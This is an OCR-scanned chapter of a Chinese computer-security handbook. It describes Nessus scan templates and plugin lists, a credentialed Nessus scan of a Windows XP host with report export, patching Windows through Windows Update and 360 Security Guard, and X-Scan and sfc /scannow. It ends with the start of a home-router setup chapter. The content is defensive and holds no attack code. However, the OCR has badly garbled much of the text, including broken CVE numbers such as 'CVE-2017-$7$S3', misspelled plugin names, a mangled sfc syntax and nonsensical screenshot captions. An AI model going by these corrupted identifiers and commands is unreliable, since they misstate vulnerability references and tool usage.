针对 网 络 设备 补丁 扫描 Nessus 提 供 的 扫描 插件 ， 如 下 图 所 示 。 


Settings Credentials Plugins 人 一 
PLUGIN FAMILY ， TOTAL PLUGIN NAME PLUGIN ID 
AIX Local Securlty Checks 11334 | AIX 5.1 : IY19744 22372 
Amazon Linux Local Security Checks 1154 AIX 5.1 : IY20496 22373 
CentDS Local Security Checks 2668 AIX 5.1 : IY21309 22374 
CISCO 962 AIX 5.1 : IY22266 22375 
Databases 595 AIX 5.1 : IY22268 22376 
Debian Local Security Checks 5822 AIX 5.1 : IY23041 22377 
F5 Networks Local Securty Checks 7116 AIX 5.1 : IY23846 22378 
Fedora Local Security Checks 12861 AIX 5.1: IY23847 22379 


5. Intel AMT Security Bypass 


Itel AMT Security Bypass 针 对 Intel 一 款 远 超 控制 功能 的 心 片 漏 洞 扫 描 ， 在 Nessus 扫 描 
模板 中 的 图 标 如 下 图 所 示 。 


Intel AMT Security Bypass 


针对 Itel 心 片 漏洞 Nessus 提 供 的 扫描 插件 ， 如 下 图 所 示 。 
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Settings Credentials Plugins 
PLUGIN FAMILY ， TOTAL PLUGIN NAME PLUGIN ID 
Settings 1 Intel Management Engine Authenticatlon Bypass (INTEL-SA-00075) (remote... 97999 
Web Servers 2 Intel Management Engine Irsecure Read / Wiite Operations RCE (INTEL-S... 97998 
Windows 1 


6. Malware Scan 


Malware Scan， 恶 意 软 件 扫描 。 该 功能 主要 是 用 于 对 已 知 恶 意 软件 添加 特征 ， 通 过 这 些 
特征 比 对 判断 目标 主机 是 否 存在 相应 恶意 软件 ， 在 Nessus 扫 拉 模 板 中 的 图 标 如 下 图 所 示 。 


Y 


Malware Scan 


针对 恶意 软件 Nessus 提 供 的 扫描 插件 ， 如 下 图 所 示 。 


Settings Credentials Plugins 
PLUGIN FAMILY ， TOTAL ” pLUGIN NAME PLUGINID 卜 
Backdoors 114 4553 Paraslte Mothersnip Backdoor Detectlon 11187 
General 13 Agobot.FO Backdoor Detec:ion 12128 
MacOS X Local Security Checks 1 aya.cg CGI Backdoor Detection 11118 
Misc. 1 Arugizer Backdoor Detection 45005 
Settings 4 ASUS Router intosvr Remcte Command Execution 80518 
Web Servers 1 BackOritice Software Detection 10024 
Windows 77 Bagle Worm Removal 12027 
Windows : User management 3 Bagle.B Worm Detection 12063 


7. Shadow Brokers Scan 


Shadow Brokers Scan， 代 理 漏 洞 扫 描 。 该 扫描 主要 针对 本 地 或 远程 代理 存在 的 漏洞 ， 
在 Nessus 扫 描 模 板 中 的 图 标 如 下 图 所 示 。 


Shadow Brokers Scan 


针对 代理 漏洞 Nessus 提 供 的 扫 拉 插件， 如 下 图 所 示 。 
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Settings Credentials Plugins 

PLUGIN FAMILY TOTAL PLUGIN NAME PLUGIN ID 了 
CentOs Local Secullty Checks i | CenNntOS 3/4:Kkermal (CESA-2005-366) 21928 

CGI abuses CentDS 3 4: php (CESA-2005:564) 21841 

CISCO 2 CentOS 3/4:squirelmail (CESA-2006:;0668) 22450 

Debian Local Secunity Checks 1 CentDS 3 : kemel (CESA-2005:293) 21923 

Fedora Local SecuUlltY Checks 11 CenNntOS 4: kemel (CESA-2006:0574) 22038 
Firewalls 1 CentOS 4 : kemel (CESA-2009:1223) A40753 
FreeBSD Local Security Checks 5 CentDS 5 : kemel (CESA-2009:1222) 43777 

FTP 


8. Spectre and Meltdown 漏 洞 


Spectre and Meltdown 漏 洞 ， 幽 灵 与 熔断 漏洞 ， 必 片 级 安全 漏洞 。Spectre 中 文 名 “ 幽 
灵 ”， 有 CVE-2017-$7$S3 和 CVE-2017-$715$ 两 个 变 体 ，Meltdown 中 文 名 “熔断 ”， 有 CVE- 
2017-5754 一 个 变 体 ， 在 Nessus 扫 描 模板 中 的 图 标 如 下 图 所 示 。 


2 


Spectre and Meltdown 


针对 幽灵 与 熔断 漏洞 Nessus 提 供 的 扫描 插件 ， 如 下 图 所 示 。 


Settings Credentials Plugins 

PLUGIN FAMILY TOTAL PLUGIN NAME PLUGIN ID 将 
AIX Local Securty Checks 7 AIX5.3TL 12 : spectre meltdown (1J03029) (Meltdown) (Spectre) 106310 
&Amazon Linux Local Securily Checks AIX 6.1 TL 9 : spectre_meltdown (03030) (Melidown) (Spectre) 106311 
CentOS Local Security Checks 12 AIX 7.1 TL 4: spectre_meltdown (4J03032) (Meltdown) (Spectre)} 106312 
Debian Local Security Checks 8 AIX ?7.1 TL 5 : spectre_meltdown (J03033) (Meltdown) (Spectre) 106313 
Fedora Local Securlty Checks 14 AIX 7.2 TL 0 : spectre_meltdown (1J03034) (Meltdown) (Spectre) 106314 
Firevsalls 1 AIX 7.2 TL 1: spectre_meltdown (03035) (Melidown) (Spectre) 106315 
FreeBSD Local Security Checks 1 AIX 7 .2 TL 2 : spectre_meltdown 04J03036) (Meltdown) (Spectre)} 106316 
General 


9. WannaCry Ransomware 


WannaCry Ransomware， 勒 索 病 毒 扫描 。 该 扫描 主要 针对 永恒 之 蓝 勒 索 类 病毒 的 一 个 
扫描 ， 可 以 选择 提供 Windows 账 号 密码 ， 这 样 通过 WMI 进 行 测试 ， 列 举 存在 哪些 软件 更 
新 ， 在 Nessus 扫 摘 模 板 中 的 图 标 如 下 图 所 示 。 


WannaCry Ransomware 


针对 勒索 病毒 Nessus 提 供 的 扫描 插件 ， 如 下 图 所 示 。 
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Settings Cregentlials Pluglns 所 
PLUGIN FAMILY ， TOTAL PLUGIN NAME PLUGIN ID 
Settings 1 Malicious Process Detection 59275 
Windows 2 MS17-010: Secunty Update for Microsott Windows SMB Server (4013389) (... 97833 
Windows : Microsoft Bulletins 1 Server Message Block [SM3) Protocol Version 1 Enabled 97086 


SMB Server DOUBLEPULSAR Backdoor / Implant Detection (Eternal Rocks) 99439 


10. Web Application Tests 


Web Application Tests，Web 应 用 渗透 扫 摘 。 该 扫 摘 主要 针对 网 络 应 用 的 渗透 测试 ， 在 
Nessus 扫 描 模板 中 的 图 标 如 下 图 所 示 。 


Web Application Tests 


针对 网 络 应 用 渗透 Nessus 提 供 的 扫描 插件 ， 如 下 图 所 示 。 


Settings Credgentlals pliugins “~ 
PLUGIN FAMILY ， TOTAL PLUGIN NAME PLUGIN ID 
CGI abuses <934 bash_history Files Disclosed via Web Server 83346 
CGI abuses : XSS E69 .SVIVentries Disclosed via Web Server 33821 
Settings 2 2BGal disp_album.php id_album Parameter SQL Iniection 16046 
Web Servers 1108 3Com Network Supervisor Traversal Arbitrary File Access 19939 
3Com Web Management Interface Default Credentials 73190 
4D WebS TAR Tomcat PIUOIn Remote BUffer Overtlow 18212 
4limages <= 1.7.1 index.php template Parameter Traversal Local File Inclusi... 21020 


Blex Guestbook livre_include.php chem_absolu Parameter Remote File Inc.. 14830 


12.5.5 ”开始 扫 摘 漏洞 


本 小 节 使 用 Nessus 从 创建 新 的 扫描 开始 ， 建 立 一 个 完整 的 扫描 直到 最 后 的 漏洞 报告 。 
创建 一 个 完整 的 扫描 需要 以 下 几 个 步骤 : 
[steep 国 创建 新 的 扫描 ， 这 里 选择 高 级 扫描 项 ， 基 础 设置 中 输入 一 个 扫描 的 名 称 以 及 目标 地 
址 ， 如 下 图 所 示 。 


Settings Credentials Complance Plugins 
BASIC v 
Name WindowXP 
General 
Schedule 局 二 
Description 
Notifications 
DISCOVERY 
ASSESSMENT Folder My Scans v 
REPORT 
Targets 
ADVANCED 9 192.168.1103 
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这 里 以 Windows XP 系 统 来 测试 ， 在 凭证 中 选择 Windows 输 入 一 个 账号 密码 ， 如 下 图 
所 示 ， 这 样 Nessus 会 登录 到 系统 提供 更 全 面 的 一 个 扫描 ， 其 中 也 包括 勒索 病毒 扫描 。 如 果 
是 在 Linux 系 统 下 选择 SSH，Nessus 还 支持 其 他 更 多 的 登录 ， 如 邮件 服务 器 、 数 据 库 等 会 根 
据 实 际 需 要 添加 凭证 。 


Settings Credentials Compliance Plugins 
H v Window 

Authentication methog F | hd 

SNMPv3 
Usemame 

SSH 

Windows Ee 
Domain 


添加 完 账号 后 下 方 有 一 个 全 局 设置 ， 
其 中 包括 4 项 ， 如 右 图 所 示 。 

(1) 不 以 明文 的 方式 传输 账号 密码 ， 
避免 因为 网 络 噢 探 造成 账号 窗 码 泄露 。 

(2) 不 以 NTLMV1 的 方式 验证 默认 ， 
会 使 用 v2 的 方式 验证 。 

(3) 开启 远程 注册 表 扫 描 ， 扫 描 结 束 
后 会 自动 关闭 。 

(4) 在 扫描 期 间 开 局 网 络 共 享 扫描 ， 
扫描 结束 后 会 自动 关闭 。 


Settings Credentials Compliance 


ATEGORIES Windows 


DISA Windows Server 2008 MS STIG v6r41 
DISA Windows Server 2008 R2 DC STIG ... 
DISA Windows Server 2008 R2 MS STIG ... 
DISA Windows Server 2012 and 2012 32 ... 
DISA Windows Server 2012 and 2012 32 .., 
DISA Windows Server 2016 STIG v1r5 


| save | -| 


Cancel 


Global Credential Settings 


ww Never send credentials in the Clear 


ww Donotuse NTLMV1 authentication 


w Starthe Remote Registry service during the Scan 


~v Enable administrative shares during the Scan 


合 规 性 设置 ， 如 果 已 知 目标 主机 操作 
系统 类 型 ， 可 以 从 这 里 进行 设置 ， 还 可 以 
选择 不 同 的 应 用 ， 这 里 选择 Windows XP 系 
统 ， 如 下 图 所 示 。 


Plugins 


- CIS Windows XP v3.1 


选择 完成 后 单 击 Save 按 钮 ， 将 所 有 的 设置 保存 ， 在 扫描 中 可 以 看 到 新 创建 的 扫描 任 


务 ， 如 下 图 所 示 。 


My Scans 


Name Schedule 


WindowXP 


On Demand 


Import 


Last Modified 


Today at 3.12 AM 


step 图 如 果 不 需 要 定时 任务 ， 直 接 单 击 最 右 侧 的 类 似 播 放 的 一 个 三 角形 图 标 按钮 ， 便 可 以 


启动 打 描 ， 如 下 图 所 示 。 
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Last Modified Y 


CQ Today at 3:29 AM 


[step 园 扫描 完成 后 ， 可 以 单 击 该 扫描 项 跳 转 到 扫描 结果 页 面 ， 如 下 图 所 示 。 这 里 会 列 出 详 
细 的 扫描 信息 ， 并 且 以 不 同 颜色 标注 出 各 种 威胁 程度 的 漏洞 数量 。 


Hosts 2 Yulnerabilities 22 History 2 


Filter ™ 


Host Vulnerabilities * 


Status: Completed 
policy: Windos_tast 
ScanNner: Local Scanner 
Stalt- Today at 3-23 AM 
En 丰 Today at 325 AM 
Elapsed: 2 minutes 


Vulnerabilites 


Critical 
入 Hilgn 
Medium 


Low 
In 各 


单 击 Export 右 侧 的 下 拉 按 钮 ， 在 弹出 的 下 拉 列 表 中 可 以 选择 将 扫描 结果 以 哪 种 形式 
耳 出 ， 如 下 图 所 示 。 


Configure Audit Trail Export 


PDF 
HTML 
CSV 


Nessus DB 


以 生成 PDF 格式 为 例 ， 生 成 的 扫描 报告 如 下 图 所 示 。 这 里 会 列 出 每 一 种 漏洞 的 详细 
说 明 ， 以 及 修补 方法 。 


192.168.1.102 


[= 
己 
oO 


MSO8-067: Microsoft Windows Server Service Crafted RPC Request 
Handling Remote Code Execution (958644) (ECLIPSEDWING) 
(uncredentialed check) 


— 
S 
© 


MS09.001: Microsoft Windows SMB Vulnerabilties Remote Code Execution 
(958687) (uncradentialed check) 


— 
S 
So 


MS17.010: Security Update for Microsoft Windows SMB Server (4013389) 
(ETERNALBLUE) (ETERNALCHAMPION) (ETER NALROMANCE) 
(ETERNALSYNERGY) (WannaCry) (EternalRocks) (Petya) (uncredentialed 
check) 


[= 
S 
[ew 


73182 Microsoft Windows XP Unsupported Instalation Detection 


[= 
己 
OO 


108797 Unsupported Windows OS 


bd 
© 


26920 Microsoft Windows SMB NULL Session Authentication 


57608 SMB Signing not required 


E 


21745 Authentication Faiure - Local Checks Not Run 


E 


104410 Authentication Faiure(s) for Provided Credentials 


之 
> 


45590 Common Platform Enumeration (CPE) 


ES 


54615 Device Type 


35716 Ethemet Card Manufacturer Detection 


[cmmow | 
EE 
E33 
Ed 
cpmcn | 
Eo 
Eo 5“ 
匡 忆 
Ewe | 
EE 
EM 
EE 
| 


z 
> 


86420 Ethemet MAC Addresses 


了 


pa :5 [el] 
- 辣 
后 


: 和 
os | 
pa 
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12.6 系统 漏洞 的 安全 防护 
要 想 防 范 系 统 的 漏洞 ， 首 先 要 及 时 为 
系统 打 补 丁 ， 下 面 介绍 几 种 为 系统 打 补 丁 
的 方法 。 
12.6.1 及 时 更 新 系统 
Windows 更 新 是 系统 目 带 的 用 于 检测 
最 新 系统 的 工具 ， 使 用 Windows 更 新 可 


以 下 载 并 安装 系统 更 新 ， 有 具体 的 操作 步骤 
如 下 。 
单 击 “开始 ”按钮 ， 在 打开 的 “ 开 
始 ” 菜 单列 表 中 选择 “设置 ”菜单 项 ， 如 
下 图 所 示 。 

文件 资源 管理 器 


io3 设置 


b> 


(中) 电源 
三 所 有 应 用 


中 OO 


[LL]] 


[step 图 打开 “设置 ”窗口 ， 可 以 看 到 有 关系 


统 设置 的 相关 功能 ， 如 下 图 所 示 。 


没 三 口 x 
设置 
号 3 EF 
素 统 设 网 亏 和 tene 个 性 化 
并 水 、 友 车 ， 应 用 、 电 荔 牙 、 打 印 机 、 崩 杯 i、 飞 行 在 式 、 队 乱 、 拙 弃 、 匡 色 
游 
” 
入 和 白 
A 二 
时 间 和 语 高 隐私 
你 的 帐户、 电子 部 件 、 证 音 、 区 域 、 日 期 讲 还 人 、 政 大 广 、 吉 对 位 置 、 柜 机 
同步 设置 、 工 作 、 共 他 比 度 
用 户 


k 


百 
Windows 更 新 该 
怎 、 告 份 


单 走 “ 更 新 和 安全 ”图 标 ， 打 开 “更 
新 和 安全 ”窗口 ， 选 择 “Windows 更 新 ” 选 
项 ， 如 下 图 所 示 。 
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Windows 更 新 


你 的 设备 已 安装 矶 新 的 更 新 。 上 次 检查 时 同 ; 昨天 10;42 


检查 田 新 
恢复 
将 下 载 并 自动 安装 可 用 更 新 ， 
激活 
正在 奇 找 有 关 最 新 更 新 的 信息 吗 ? 
针对 开发 人 员 了 解 吕 多 信忠 
涡 级 选 项 


单 击 “ 检 查 更 新 ”按钮 ， 即 可 开始 检 
查 网 上 是 否 存 在 更 新 文件 ， 如 下 图 所 示 。 


EE 
各 3 ”更 新 和 安全 ; 
Windows 更 新 


Windows Defender a 困 


正在 检查 更 新 - 

a 正在 查 搞 有 关 最 新 更 新 的 信息 中 ? 
了 解 更 多 信息 

激活 涡 吸 选项 

针对 开发 人 只 


[Sep 图 检查 完毕 后 ， 如 果 存 在 更 新 文件 ， 则 
会 弹出 下 图 所 示 的 信息 提示 ， 提 示 用 户 有 
可 用 更 新 ， 并 自动 开始 下 载 更 新 文件 。 


所 设 量 = 口 x 


中 3 WINDOWS 更 新 


Windows 更 新 


有 可 用 更 新 。 
*， 运用 于 Windows 10 Version 1511 的 以 积 训 新 (KB3124262)。 


详细 信息 


正在 准备 安装 更 新 70% 


正在 查找 有 关 最 新 更 新 的 信息 吗 ? 
了 解 更 多 信息 


高 级 选项 


下 载 完 毕 后 ， 系 统 会 自动 安装 更 新 六 
提示 框 。 


《和 ji 


5 WINDOWs 更 新 


已 为 你 安排 了 一 次 重启 


如 时 过 要 ， 你 可 以 立即 更 新 启动 ， 也 可 以 将 更 新 启动 至 新 计 芭 为 在 更 方便 时 进行 。 许 确保 在 计划 的 时 
加 将 设备 授 迎 电学 ， 棋 英 思 新 阳 大 小 ， 安 委 吕 能 实 要 一 届时 间 ， 


(@) 设备 将 在 朵 车 峙 重 局 (明天 3:30 似乎 合适 }。 


立即 融 新 后 动 


正在 吉 找 有 关 最 新 更 新 的 信息 吗 ? 
了 解 更 裕 信 息 


单 击 “ 立 即 重新 启动 ”按钮 ， 即 重新 
ye SI 再 次 打开 
“Windows 更 新 ”窗口 ， 在 其 中 可 以 看 到 
py pe 更 新 …… ”信息 
提示 ， 如 下 图 所 示 。 


Windows 更 新 
你 的 设备 已 安装 和 新 的 更 新 。 上 次 检查 时 间 : 今天 
16:07 
恢复 检查 更 新 
车 活 将 下 就 并 自动 安 萄 可 用 更 新 。 
针对 开发 人 员 正在 查找 有 关 最 新 更 新 的 位 吕 吗 ? 
了 解 更 多 信息 
忘 级 选项 


[step 图 单 去 “高 级 项 ”按钮 ， 打开 “高 级 
人 ee ey 在 其 中 可 以 设置 更 
新 的 安装 方式 ， 如 下 图 所 示 。 

汉 ? 。 高 级 选项 


请 选择 安装 更 新 的 方式 


通知 以 安排 齐 新 启动 


下 
三 CIJnrgumTrsJe1J。 我 们 将 在 你 未 使 用 设备 时 自动 至 新 启动 设备 。 更 新 构 不 会 通过 撤 流 号 计 吃 的 
连接 可 能 会 收 加 进行 下 载 


喇 更 新 Windows 时 提供 其 他 Microsoft 产品 的 更 新 。 


[| 推 返 升 级 
了 解 详 组 信息 


查 几 更 新 历史 记录 


选择 如 何 提供 更 新 


获取 Insider Preview 版 本 


成 为 第 一 批 能 导 理 看 Windows 的 后 续 更 新 和 改进 并 提供 反 饰 的 人 员 之 一 。 
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12.6.2 ”为 系统 漏洞 打 补 丁 


除 使 用 Windows 系 统 目 带 的 Windows Up- 
date 下 载 并 及 时 为 系统 修复 漏洞 外 ， 还 可 以 使 
用 第 三 方 软件 及 时 为 系统 下 载 并 安装 漏洞 补 
丁 ， 常 用 的 有 360 安 全 卫士 、 优 化 大 师 等 。 

使 用 360 安 全 卫士 修复 系统 漏洞 的 具体 
liege 
双击 桌面 上 “360 安 全 卫士 ”图 标 ， 
Fi “360 安 全 卫士 ”， 如 下 图 所 示 。 


已 11 天 没有 体检 , 建议 立即 体检 | 


© 多 


单 击 “系统 修复 ”按钮 ， 进 入 下 图 所 
让 如 下 图 所 示 。 


统 


盟 上 回 上 图 


得 补丁 杰 介 于 坊 芝 定 下 大林 主页 肋 护 ”主页 作 复 


单 击 “ 全 面 修 复 ” 按 钮 ，360 安 全 卫 
始 自 动 扫描 系统 中 存在 的 漏洞 ， 并 在 
下 面 的 界面 中 显示 出 来 ， 用 户 在 其 中 可 以 


SS 
| 夫人 一] 让 : Kk - 天 
扫描 已 完成 , 发 现 潜在 危险 项 , 请 立即 修复 。 
3 小 页 个 糙 逢 陀 号 贰 目 . 放生 引 使 系统 瑰 宁 下 党 后 行 ， 商 立 如 售 得 
~ 时 漏洞 熔 亿 - 1 项 : - 骨 会 屋 才 忆 。 纳什 臣 江 二 从 语 访 ， 旋 必 和 局 一 扫 外 多 
v | KR4467694 - 2018. 授 用 于 hicbe Flwsh Playor -三 F Jj20.7MIF 马路 
bw - 201 
~ 同 歇 什 丸 急 - 5 骨 演示 理 林 户 工作 息 - 痢 eyer for Windews 证 卫 申 
| KB4461506 - Microsott Outlod DK 
vv KO4022232 - Miu h 妇 跑 
KB44614 TH - Micracott pe I 
KB4461504 Micro ld 
KB4461473 - Skype for Busine? a 
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单 击 “ 一 键 修 复 ” 按 钮 ， 开 始 修复 系 
统 存 在 的 漏洞 ， 如 下 图 所 示 。 


轴 漂 曙 修复 - 1] 身 这些 括 奋 可 能 公 令 本 三 、 认 诲 利 月 ， 


K94467694 20189 适用 于 Adobe Pash Player .区 1 8 下 载 03% 
国 软件 修复 - 5 顶 汉 由 环 条 用 于 个 扫 一 此 到 


KRd44615n6 - Mirro<cft Outinok 2016 安全 更 .|[ 到 
KB4022232 - Microwoft Of 多 e 2016 空 全 更 新 (.， 同 8-11-1 2MIE 等 行 悼 和 


KR4461478 - Microsoft proyect 2016 安全 更 新 巨 

KB4.461504 - Microsoft Word 2016 安全 更 新 (. 14 4 . 每 示人 情操 

KR4461473 - Sinype for Psness 5 去 会 要， 目 
修复 闪 带 蝇 各 类 锥 【 仅 坟 次 有 效 


修复 完成 后 ， 则 系统 漏洞 的 状态 变 为 
， 如 下 图 所 示 。 


¢ ee 


漏洞 修复 处 理 中 


上 和 下 


到 着 疝 耻 复 - 1 项 位 芝 第 二 可 惨 公关 


K84467694 ”2018 通用 于 Adobe Flash pleyer - 已 


加 软件 你 做 - 5 项 这 此 更 所 用 于 伟 扣 一 必 活 和 
KR44615n6 - Mirroscf Owtiook 2016 安全 更 1 门 志 强 25% 
K84022232 - Microsoft Of 2016 安全 更 新 (已 6 } 钰 苍 下 载 
KR4461476 - Micerosoft Proyect 2016 去 全 更 新 - 局 页 一 何 科 


K84461504 - IMicrosoft Word 2016 去 全 更 新 (- 14 JOB 等 季候 所 


KR4461473 - Sinype for Psness 2015 去 会 到 


俱 复 关 矶 日 怠 关 羽 【 公 之 次 有 效 


12.7 实战 演练 


实战 演练 1 一 一 使 用 X-Scan 扫 描 系 统 
涯 闻 
X-Scan 是 国内 最 著名 的 综合 扫描 器 之 
一 ， 它 可 以 扫描 出 操作 系统 类 型 及 版 本 、 
标准 端口 状态 及 端口 BANNER 信 息 、CGI 漏 
洞 、IIS 漏 洞 、RPC 漏 洞 等 信息 。 
.papspeniep Weg h 
在 “X-Scan v3.3 GUI” 主 窗口 中 单 
rapt 台 扫 描 图 标 苞 ， 即 可 进行 扫描 。 在 扫 
描 的 同时 显示 扫描 进程 和 扫描 所 得 到 的 信 
息 ， 如 下 图 所 示 。 
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内 y X-5can v3.3 GUI 一 口 x 
文 性 [Vi 设 窜 (W) 坦言 工 县 (Y) [language 和 老 动 (7) 
| |b 有 加 | 名 | 国 省 | 问 


了 有 本 ... 


三 多 利生 Ei 《用 时 0. 172 种 


lcalhos 
pi 旦 罕 四 于 让 服务 * 


| 7 Active/Maximum host thread: 1/10, Current/Maximum thread: 2/1 pp 


在 扫描 完成 之 后 ， 即 可 看 到 HTML 格 
式 的 扫描 报告 。 在 其 中 既 可 看 到 活动 主机 IP 
地 址 、 存 在 的 系统 漏洞 和 其 他 安全 隐患 ， 还 
可 看 到 安全 隐患 的 解决 方案 ， 如 下 图 所 示 。 


—- OO 
总 file:///Dxy360 安 全 浏览 器 F 信 人 各 X-Scan Report nn 6 
| X-Scan 检测 报 吉 人 ~ 
| 本 撤去 列 岂 了 法 苍 测 主 宙 的 信 运 源 油 信息， 博信 近江 示 仿 自 稚 义 尝 内 守信 六 生 名 局 补 , 不 广 当 加 X-5can 生 六 要 评 项 日 
检测 结果 
| 容 活 主机 1 | 
洒 尖 共生 0 
营 襄 区 本 0 
投 示 站 各 1 
主机 检测 结果 
localhest ER 司 
EPE 
车 Re 主机 分 析 : Iocalhost 
| 主机 地 址 | 市 口 /服务 服务 乔 测 | 
localhest |microsoft-ds (345jtcp) 砾 现 实生 者 示 
安全 也 洞 及 解决 方案 : localhost 
类 型 端口 /服务 去 全 映 科 及 舱 严 方案 | 
提示 microsoft-ds 开放 服务 | 
(445/trp) Se 
"microso 人 ft-ds" 限 矢 可 能 运行 于 管 演 词 . 
NESSUS_ID ; 10330 v 


在 “X-Scan v3.3 GUI” 主 窗口 中 切换 
到 “漏洞 信息 ”选项 卡 下 ， 即 可 看 到 存在 
漏洞 的 主机 信息 » 如 下 图 所 示 o 

忆 y X-Scanv33 GUI 一 口 x 
文件 [Vi 设置 (W) 可 于 (X) 工具 IY) Language 著 动 ( 忆 


|]|b 有 有 | 国 | 国 千 | 回 


mE: looalhoct 


vocalhos 
ha I 445/tcp 
[localhost|: 445/tep — a “服务 可 能 运行 于 谤 3 壬 喇 . 


/Active/Maximum host thread: 1/10, Current/Maximum thread: 2/1 4 


实战 演练 2 一 一 使 用 个 令 扫 摘 并 修复 系统 


SFC 命 令 是 Windows 操 作 系 统 中 使 用 频 
率 比 较 高 的 命令 ， 主 要 作用 是 扫描 所 有 受 
保护 的 系统 文件 并 完成 修复 工作 。 该 命令 
的 语法 格式 如 下 : 

ye 


SCANBOOT!] 
CACHESIZE=x] 


各 个 参数 的 含义 如 下 : 
e /SCANNOW: 立即 扫描 所 有 受 保护 
的 系统 文件 。 
e /SCANONCE: 下 次 启动 时 扫描 所 
有 受 保护 的 系统 文件 。 
e /SCANBOOT: 每 次 启动 时 扫描 所 
有 受 保护 的 系统 文件 。 
e /REVERT: 将 扫 摘 返回 到 默认 设置 。 
e /PURGECACHE: 清除 文件 缓存 。 
e /CACHESIZE=x: 设置 文件 缓存 
大 小 。 
下 面 以 最 第 用 的 sfc/scannow 为 例 进行 
讲解 。 具 体操 作 步 又 如 下 : 
右 击 “开始 ”按钮 ， 在 弹出 的 快捷 菜 
单 中 选择 “命令 提示 符 ( 管 理 员 ) ”菜单 
命令 ， 如 下 图 所 示 。 


[/SCANNOWI] 
[/REVERT] 


IASCANONCE] [1/ 
[/PURGECACHE] [/ 


[Se 图 弹出 “管理 员 : 命令 提示 符 ” 窗 口 ， 
输入 命令 sfc/scannow， 按 Enter 刍 确认， 如 
下 图 所 示 。 
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国 各 担 员 ; 命令 得 一 符 - sfc /scannow 一 口 
Nicrosoft Windows [由 杰 10.0. 10588) 
上 24D] M1 cr LOCpOrAaAtLone 保留 所 有 权利 ， 


赏 罗 五 笔 半 : 


开始 自动 扫描 系统 ， 并 显示 扫描 的 进 
度 ， 如 下 图 所 示 。 


[icrosoft Windows [抽检 1D. D. 1058E 
| n Wi -rnsnft+ 已 


LOrpoOratione 保留 所 有 权 乔 |， 


涅 本 符 - sfc /scannow 口 


开始 系统 扫描 。 此 过 程 将 青苗 一 些 时 间 


开始 圣 纺 扫 措 的 验证 阶段 
驻 证 21% 已 完成 。 


滞 坎 五 笔 半 


扫描 的 过 程 中 ， 如 果 发 现 损坏 的 系 
统 文件 ， 会 自动 进行 修复 操作 ， 并 显示 修 


开始 系统 扫描 。 此 过 程 将 这 划一 些 时 间 


始 圣 统 扫描 的 验证 阶段 
驻 证 21% 已 完成 。 
Hindows 资源 保护 找到 了 损坏 究 件 并 成 功 修 虽 
CHBb .Log windirv\Logs “CHb “LHb. [ 

CBS “CBS .Jogo iEi 二 富 


L : Min d OW \Lo 可 ES 
当前 不 支持 日 志 记 . 


12.8 小 试 身 手 

使 用 Nmap 工 具 扫描 漏洞 。 
使 用 OpenVAS 工 具 扫 描 漏 洞 。 
使 用 Nessus 工 具 扫 摘 漏洞 。 
系统 漏洞 的 安全 防护 。 


练习 1: 
练习 2: 
练习 3: 
练习 4: 


肿 13 重 ”加 国 无 线 网 络 的 大 中 


在 无 线 网 络 中 ， 能 够 发 送 与 接收 信号 的 重要 设备 就 是 无 线路 由 器 了 ， 因 此 ， 对 无 
线路 由 器 的 安全 防护 ， 就 等 于 看 紧 无 线 网 络 的 大 门 。 本 草 介绍 无 线路 由 器 的 安全 防护 策 
略 ， 主 要 包括 无 线路 由 器 的 基本 设置 、 无 线路 由 器 的 安全 策略 以 及 无 线路 由 安全 管理 工 


具 等 。 


无 线路 由 器 相信 大 家 都 不 陌生 ， 但 是 
懂得 如 何 设 置 的 却 不 多 。 本 节 针 对 家 用 无 
线路 由 器 的 设置 进行 讲解 。 


13.1.1 通过 设置 向 导 快速 上 网 


目前 多 数 家 用 无 线路 由 器 都 提供 了 
网 页 进入 页 面 ， 当 用 户 登 录 路 由 后 会 提供 
一 个 同 导 ， 通 过 向 导 设 置 可 以 最 快 地 实现 
连接 外 网 。 家 用 路 由 器 背面 会 有 路 由 器 型 
号 、 路 由 器 IP (进入 路 由 的 地 址 ) 、 管 理 员 
账号 及 密码 等 信息 ， 如 下 图 所 示 。 


I 
和 


|||.4 深圳 市 普 联 技术 有 限 公 写 


通过 向 导 设 置 路 由 器 并 进行 上 网 的 具 
体操 作 步 又 如 下 : 

打开 IE 浏 览 器 ， 在 地 址 栏 中 输入 路 由 
器 的 网 址 ， 一 般 情 况 下 路 由 器 的 默认 网 址 
为 192.168.0.1， 输 入 完成 后 单 击 “ 转 至 ” 按 
钮 ， 即 可 打开 路 由 器 的 登录 窗口 ， 如 下 图 
所 示 。 


回 TL-WR835N 


x 四 局 
te 站 | 19216801 六 | 三 WW 1 


在 “请 输入 管理 员 密 码 ” 文 本 框 中 输 
入 管理 员 的 密码 ， 默 认 情 况 下 管理 员 的 密 
码 为 123456， 如 下 图 所 示 。 


人 ye | 192.16801 六 | 三 % 


十 输入 管理 员 密 妈 


[step 轿 单 击 “ 确 认 ” 按 钮 ， 即 可 进入 路 由 器 
的 “运行 状态 ”工作 界面 ， 在 其 中 可 以 查 
看 路 由 器 的 基本 信息 ， 如 下 图 所 示 。 


旺 TLWR885N x BPE 


“= 办 192.168.0.1 六 | 一 : 


= [加 | Xx 
HQ 


TP-LINIK [一 一 Sf 天线 谏 率 汪 与 现 无 线 自 由 连 扫 构想 


雪 前 执 件 版 本 : 
当 尚 王 件 版 本 : 


1LD28 Buld 1405 以 Rel 3313%m 
Ws LQ DUO 


i1675-90~1F-9E-54 
192. 163.0.1 


无 圭 功 聊 : 启用 

SSID 号 : TP-IL 了 1L 

仿 首 : 自动 《当前 仿 章 1) 
荡 式 : ljben nixed 

频 披 之 宽 : 自动 

Mac 地 址 : 14-75-90-1F-95-Eé 


ES 图 选择 “设置 向 导 ” 选 项 ， 即 可 进入 
“设置 向 导 ” 对 话 框 ， 如 下 图 所 示 。 


设置 由] 号 


本 [9 号 可 设置 上 网 所 需 的 基本 网 络 参 数 ， 请 单 击 “ 下 一 步 ” 继 续 。 若 要 详细 设 
置 某 项 功能 或 参数 ， 请 点 击 左 侧 由 关 栏 目 。 


[step 图 单 击 “ 下 一 步 ” 按 钮 ， 进 入 “设置 向 
导 - 上 网 方式 ”对 话 框 ， 在 其 中 选择 上 网 方 
式 。 其 中 PPPoE 为 拨号 上 网 ， 一 般 由 运营 商 
提供 具体 账号 、 密 码 ， 动 态 IP 和 静态 IP 则 多 
为 分 网 时 使 用 ， 可 以 根据 实际 需求 选择 ， 
如 下 图 所 示 。 


设置 向 号 -上 网 方式 
本 向 号 提供 三 种 最 常见 的 上 网 方式 供 选择 。 若 为 其 它 上 网 方式 ， 请 点 击 左 侧 “ 网 
